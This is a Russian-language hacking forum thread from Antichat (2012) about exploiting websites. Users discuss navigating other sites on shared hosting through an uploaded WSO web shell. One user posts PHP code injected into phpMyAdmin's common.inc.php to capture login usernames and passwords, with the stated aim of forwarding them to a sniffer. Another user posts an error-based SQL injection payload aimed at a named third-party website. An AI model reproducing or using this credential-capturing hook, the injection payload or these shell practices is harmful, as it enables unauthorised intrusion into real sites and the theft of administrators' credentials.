HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 22.08.2012, 08:23
WendM
Познающий
Регистрация: 29.01.2012
Сообщений: 44
С нами: 7519286

Репутация: 3
По умолчанию

Цитата:
Сообщение от OxoTnik  
WSO.
Там через консоль? Если да то какую команду вбить?
 
Ответить с цитированием

  #2  
Старый 22.08.2012, 08:43
jasp3r
Познающий
Регистрация: 23.04.2012
Сообщений: 44
С нами: 7396886

Репутация: 0
По умолчанию

WendM

если права на чтение есть то без консоли домашняя должна быть видна

можно и через консоль: ls -l -a
 
Ответить с цитированием

  #3  
Старый 22.08.2012, 10:13
WendM
Познающий
Регистрация: 29.01.2012
Сообщений: 44
С нами: 7519286

Репутация: 3
По умолчанию

Цитата:
Сообщение от jasp3r  
WendM
если права на чтение есть то без консоли домашняя должна быть видна
можно и через консоль: ls -l -a
права есть, и все я вижу. Суть в том что там много папок, в них папки сайтов, название папки=домен сайта. Так вот, что бы мне руками не шустрить все папки, и не выписывать все домены, я хочу вызвать дерево директорий, потом спарсить названия доменов

Цитата:
Сообщение от jasp3r  
WendM
можно и через консоль: ls -l -a
только почему то ноль реакции.

P.S Сижу под пользователем Apache.
 
Ответить с цитированием

  #4  
Старый 22.08.2012, 13:08
WendM
Познающий
Регистрация: 29.01.2012
Сообщений: 44
С нами: 7519286

Репутация: 3
По умолчанию

Как отослать на снифер пароль введенный в phpmyadmin? Тренируюсь на локалки, для теста добавил в index.php

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_username'[/COLOR][COLOR="#007700"]]))

{

[/
COLOR][COLOR="#0000BB"]$get_user[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_username'[/COLOR][COLOR="#007700"]];

echo[/
COLOR][COLOR="#0000BB"]$post_user[/COLOR][COLOR="#007700"];

}

if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_password'[/COLOR][COLOR="#007700"]]))

{

[/COLOR][COLOR="#0000BB"]$get_pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_password'[/COLOR][COLOR="#007700"]];

echo[/
COLOR][COLOR="#0000BB"]$post_pass[/COLOR][COLOR="#007700"];

}[/
COLOR][/COLOR
но ни чего не выходит, переменные $get_pass $get_user пустые. Что не так?
 
Ответить с цитированием

  #5  
Старый 22.08.2012, 13:31
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию

Цитата:
Сообщение от WendM  
Как отослать на снифер пароль введенный в phpmyadmin? Тренируюсь на локалки, для теста добавил в index.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_username'[/COLOR][COLOR="#007700"]]))

{

[/
COLOR][COLOR="#0000BB"]$get_user[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_username'[/COLOR][COLOR="#007700"]];

echo[/
COLOR][COLOR="#0000BB"]$post_user[/COLOR][COLOR="#007700"];

}

if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_password'[/COLOR][COLOR="#007700"]]))

{

[/COLOR][COLOR="#0000BB"]$get_pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_password'[/COLOR][COLOR="#007700"]];

echo[/
COLOR][COLOR="#0000BB"]$post_pass[/COLOR][COLOR="#007700"];

}[/
COLOR][/COLOR
но ни чего не выходит, переменные $get_pass $get_user пустые. Что не так?
А если так ?

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_username'[/COLOR][COLOR="#007700"]]))

{

[/COLOR][COLOR="#0000BB"]$get_user[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_username'[/COLOR][COLOR="#007700"]];

echo[/COLOR][COLOR="#0000BB"]$get_user[/COLOR][COLOR="#007700"];

}

if
(isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_password'[/COLOR][COLOR="#007700"]]))

{

[/COLOR][COLOR="#0000BB"]$get_pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_password'[/COLOR][COLOR="#007700"]];

echo[/COLOR][COLOR="#0000BB"]$get_pass[/COLOR][COLOR="#007700"];

}[/COLOR][/COLOR
$get_pass и $get_user как раз не пустые, а вот выводимые на экран данные $post_pass $post_user - пустые.
 
Ответить с цитированием

  #6  
Старый 22.08.2012, 13:38
WendM
Познающий
Регистрация: 29.01.2012
Сообщений: 44
С нами: 7519286

Репутация: 3
По умолчанию

Цитата:
Сообщение от BigBear  
А если так ?
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_username'[/COLOR][COLOR="#007700"]]))

{

[/COLOR][COLOR="#0000BB"]$get_user[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_username'[/COLOR][COLOR="#007700"]];

echo[/COLOR][COLOR="#0000BB"]$get_user[/COLOR][COLOR="#007700"];

}

if
(isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_password'[/COLOR][COLOR="#007700"]]))

{

[/COLOR][COLOR="#0000BB"]$get_pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_password'[/COLOR][COLOR="#007700"]];

echo[/COLOR][COLOR="#0000BB"]$get_pass[/COLOR][COLOR="#007700"];

}[/COLOR][/COLOR
$get_pass и $get_user как раз не пустые, а вот выводимые на экран данные$post_user $post_pass - пустые.
ой, я тупанул. Просто забыл переименовать когда сюда постил. Т.е $get_pass= $post_pass и $get_user=$post_user.

А так вопрос решен, там в индексе инклуидится common.inc.php, вот в него и прописываем (в самое начало)

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_username'[/COLOR][COLOR="#007700"]]))

{

[/COLOR][COLOR="#0000BB"]$get_user[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_username'[/COLOR][COLOR="#007700"]];

echo[/COLOR][COLOR="#0000BB"]$get_user[/COLOR][COLOR="#007700"];

}

if
(isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_password'[/COLOR][COLOR="#007700"]]))

{

[/COLOR][COLOR="#0000BB"]$get_pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pma_password'[/COLOR][COLOR="#007700"]];

echo[/COLOR][COLOR="#0000BB"]$get_pass[/COLOR][COLOR="#007700"];

}[/COLOR][/COLOR
Всем спасибо за внимание
 
Ответить с цитированием

  #7  
Старый 22.08.2012, 17:23
WendM
Познающий
Регистрация: 29.01.2012
Сообщений: 44
С нами: 7519286

Репутация: 3
По умолчанию

Цитата:
Сообщение от BigBear  
Права -rw-r--r-- указывают на то, что файл доступен на редактирование только создателю
Странно, залил шел на другой сайт, права теже, но редактирую спокойно любые файлы сайта. В чем фишка ?

На том сайте где не могу редактировать сижу под пользователем Apache, могу ходить по всем сайтам на хостинге
 
Ответить с цитированием

  #8  
Старый 22.08.2012, 21:22
foma9999
Новичок
Регистрация: 05.01.2010
Сообщений: 9
С нами: 8603990

Репутация: 0
По умолчанию

http://myrusland.ru/maps_regions_'.htm

Все попытки раскрутить не приводили к успеху, вроде как всего 1 таблица, хотя я могу ошибаться.
 
Ответить с цитированием

  #9  
Старый 22.08.2012, 21:32
Always
Познающий
Регистрация: 08.02.2012
Сообщений: 72
С нами: 7504886

Репутация: 0
По умолчанию

http://myrusland.ru/maps_regions_'and(select*from(select(name_const(ve rsion(),1)),name_const(version(),1))a)and(1)='1+--+.htm
 
Ответить с цитированием

  #10  
Старый 23.08.2012, 07:53
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию

Цитата:
Сообщение от WendM  
Странно, залил шел на другой сайт, права
теже
, но редактирую спокойно любые файлы сайта. В чем фишка ?
На том сайте где не могу редактировать сижу под пользователем Apache, могу ходить по всем сайтам на хостинге
Элементарно же, Ватсон. Значит apacheне является создателем для того файла, что ты редактируешь. А пользователь на другом сервере - является.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...